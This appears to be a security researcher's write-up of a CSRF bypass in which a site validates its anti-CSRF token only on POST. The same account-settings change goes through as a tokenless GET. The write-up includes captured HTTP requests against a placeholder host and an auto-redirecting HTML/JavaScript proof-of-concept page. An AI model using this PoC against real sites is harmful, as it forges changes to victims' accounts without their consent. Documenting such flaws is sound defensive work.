Vulnerability: using GET instead of POST to bypass CSRF protection   Difficulty: low
Hi folks! It is always a pleasure to share something good with you. As the title suggests, today I am sharing a technique for bypassing CSRF protection.

What is CSRF protection?

In short, a CSRF (cross-site request forgery) attack targets the state-changing requests of a web site. To stop it, developers add an anti-CSRF token to such requests in one of several ways. If you want the details, see "Article-1" and "Article-2".

Now assume the target site is vulnhost.com and that it validates our request using data carried in a POST body: vulnhost.com places a _csrf token in the POST request and then checks that token on the server side. The state-changing request looks like this:
```http
POST /mycenter/settings/account.html?2-1.IBehaviorListener.0-formContact-saveContact HTTP/1.1
Host: en.vulnhost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://en.vulnhost.com/mycenter/settings/account.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Wicket-Ajax: true
Migration-Wicket: 6
Wicket-Ajax-BaseURL: mycenter/settings/account.html
Wicket-FocusedElementId: id49
X-Requested-With: XMLHttpRequest
Content-Length: 246
Cookie: .......
Connection: close

_csrf=725a7f90-192f-4b94-8fc9-6320ace14fef&id48_hf_0=&gender=radio8&firstName=xx&lastName=YY&saveContact=1
```
Here `_csrf=...` is the randomly generated token that is submitted to the server for validation. The catch is that the token is only checked on POST: if I send the same parameters as a GET request and simply leave out `_csrf`, the server performs no validation at all and still processes the change:
```http
GET /mycenter/settings/account.html?2-1.IBehaviorListener.0-formContact-saveContact=&id48_hf_0=&gender=radio8&firstName=XX&lastName=YY&saveContact=1 HTTP/1.1
Host: en.vulnhost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://en.vulnhost.com/mycenter/settings/account.html
Wicket-Ajax: true
Migration-Wicket: 6
Wicket-Ajax-BaseURL: mycenter/settings/account.html
Wicket-FocusedElementId: id49
X-Requested-With: XMLHttpRequest
Cookie: ...
Connection: close
```
To turn this into a proof of concept I combined a little JavaScript with HTML. Note that a top-level navigation triggered by `window.location` carries none of the custom `Wicket-Ajax` and `X-Requested-With` headers seen in the capture; since the PoC works, the server evidently does not require them for this endpoint:
```html
<html>
<head>
<script type="text/javascript">
var timer = null;
function auto_reload()
{
    // Navigate the victim's browser to the forged GET; their vulnhost.com cookies are sent automatically.
    window.location = 'https://en.vulnhost.com/mycenter/settings/account.html?4-2.IBehaviorListener.0-formContact-saveContact=&id48_hf_0=&gender=radio8&firstName=Account&lastName=Takeover&saveContact=1';
}
</script>
</head>
<!-- Fire the redirect 5 seconds after the page loads. -->
<body onload="timer = setTimeout(auto_reload, 5000);">
</body>
</html>
```
So as soon as the victim visits my crafted page, the browser is redirected to the CSRF URL and the victim's account details are changed automatically.